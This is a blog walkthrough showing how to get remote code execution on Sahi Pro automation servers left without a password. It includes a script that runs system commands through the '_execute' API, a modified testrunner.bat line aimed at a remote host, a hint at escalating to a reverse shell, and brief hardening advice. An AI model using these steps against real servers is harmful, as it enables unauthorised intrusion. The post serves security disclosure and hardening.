Hi All . Today I will explain how to pawn a misconfigured sahi pro automation server.
What is sahi pro?
Sahi pro is one of the popular leading automation tool which helps enterprises to automate their web application , desktop and mobile application scenarios .
It is a tough competent to other automation tools such as QTP and selenium . As per my experience sahi pro is much better than the other tools mentioned in few aspects ( object spy and relative API’s ).
Sahi pro allows automation testers to write code either with their sahi language ( wrapper to JS with awesome full fledged API’s ) , ruby etc
I being a former automation test engineer would recommend their sahi language to automate test scenarios.
In this post ,we will concentrate on web application automation aspect.
Sahi has some other nice extra features ( *interesting* ) such as web based text editor, configuration and web based reports console , remote machine executions on same network.
Why would one keep sahi pro running everytime?
In an enterprise environment , there would be unattended suite executions running all time . which can extend 8 – 24 hrs without monitoring! . A perfect scenario for any attacker or an internal pentester .
What do you mean by “misconfigured” ?
Sahi allows end users to set a password to these web portal which is neglected majority of times by an end user . (Trust me on this! i have seen too many times. Many do not even know they can set password to these portals!) ( hope sahi also adds a bruteforce proof login forms from next release. )
This looks promising. how much can we get out of this ?
We will see how to gain remote code execution on the target machine running sahi pro with this simple misconfiguration.
So basically , if we need to gain remote code execution on these servers we can divide our tasks as following steps.
- Upload a malicious sahi script which executes our desired commands.
- find a way to execute these scripts remotely on same network.
- Finally find a way to fetch results of our task .
Step 1 : upload a malicious sahi script
As i have specified earlier , sahi has a web based editor to create our script and suite files. by default sahi runs on port 9999 .
we can access this portal across the network . lets access a remote web portal and create our malicious sahi file.
Fig 1 : shows the created malicious sahi script .
here is the code for malicious sahi script :
var $tc1 = _testcase("TC-1","lets get some code execution. ").start(); _navigateTo("https://google.com"); _selectWindow("/google/"); $cmd_output1 = _execute("whoami" , true ) $cmd_output2 = _execute("ipconfig",true ) _log("command output1 : "+ $cmd_output1); _log("command output2 : "+ $cmd_output2); $tc1.end();
in our code we have used a testcase API to make it run as a single testcase (uniform reporting ). We make use of “_execute” API which helps us to execute system commands and external files ( bat, sh etc).
From sahi documentation , this API has following syntax :
_execute($cmd[, $isSync[, $timeout]])
First parameter takes command to be executed . and second parameter is set to true for us ( isSync = true ) so result is returned only on completion of command. This API returns the result of the command as string.
we finally print the resultant command output using “_log” API.
Step 2 : Find a way to execute the created malicious file
Each sahi pro installation comes with a “testrunner” file which helps us to give suite executions or execute scripts through command prompt.
Suite files are files which contain bunch of sahi script names to be executed in it (” *.suite “) . they are very useful for complex scenarios which involve multiple sah files .
by default we can execute only suite/sahi files on our machines using testrunner.bat file . we can modify it to execute scripts on remote machines by editing content of file . change host and port parameter from “localhost” “9999” in the file to make it either parameterized or hard code it to value we want . (testrunner.bat file is in location userdata/bin/testrunner.bat)
in our case :
modified line :
java -cp %SAHI_HOME%\lib\ant-sahi.jar in.co.sahi.distributed.DSahiRunner %CUSTOM_FIELDS% -isNonDistributedRun true -scriptsPathMaster %SCRIPTS_PATH% -suite %1 -browserDeviceParams %3 -logsInfo “%LOGS_INFO%” -baseURL “%START_URL%” -host 192.168.0.104 -port 9999 -threads %THREADS% -abortedRetryCount %ABORTED_RETRY_COUNT% -failureRetryCount %FAILURE_RETRY_COUNT% -useSingleSession %SINGLE_SESSION% -sendEmail %SEND_EMAIL_REPORT% -emailTrigger “%EMAIL_TRIGGER%” -emailProperties “%EMAIL_PROPERTIES%” -sendEmailPeriodically “%SEND_EMAIL_REPORT_PERIODICALLY%” -sendEmailPeriodicallyTime “%SEND_EMAIL_REPORT_PERIODICALLY_TIME%” -emailPasswordHidden “%EMAIL_PASSWORD_HIDDEN%” -showPeriodicSummary %SHOW_PERIODIC_SUMMARY% -tags %4
So we should have a sahi installation on our system too to execute this ?
since sahi also have open source version ( download it for free!)
Nope! we will see how to skip that later.
Now lets execute it on our remote system using testrunner.bat !
command format :
testrunner.bat rce.sah https://google.com ie
first parameter is the file to be executed , second parameter specifies start URL and finally third one specifies type of browser to be executed on remote systems.
( remember I specified we do not need to install sahi pro? from the above screenshot , we can see our script has converted our task to a http request url! grab it and just modify the script name and host name to use it remotely without installation of sahi on attacker machine )
Step 3 : fetch the results of our execution.
Once our status returned is success . we can see the results on reports portal .
Now lets see the report for our specific task execution :
We get code execution! awesome ! we can enhance this to get a reverse shell , by uploading another powershell script and calling through this malicious sahi file. ( as no restriction in type of file being created . )
How can i harden my sahi instance against such attacks?
>> password protect sahi pro web portals . change the default credentials to strong credentials
>> define a fine granular file access provided in sahi pro configuration.
Shubha dina! 🙂
update : its a full fledged RCE! sahi pro does not have any server side checks for the authenticated requests, which results in directly calling the functional endpoints. There is no patch as of this date.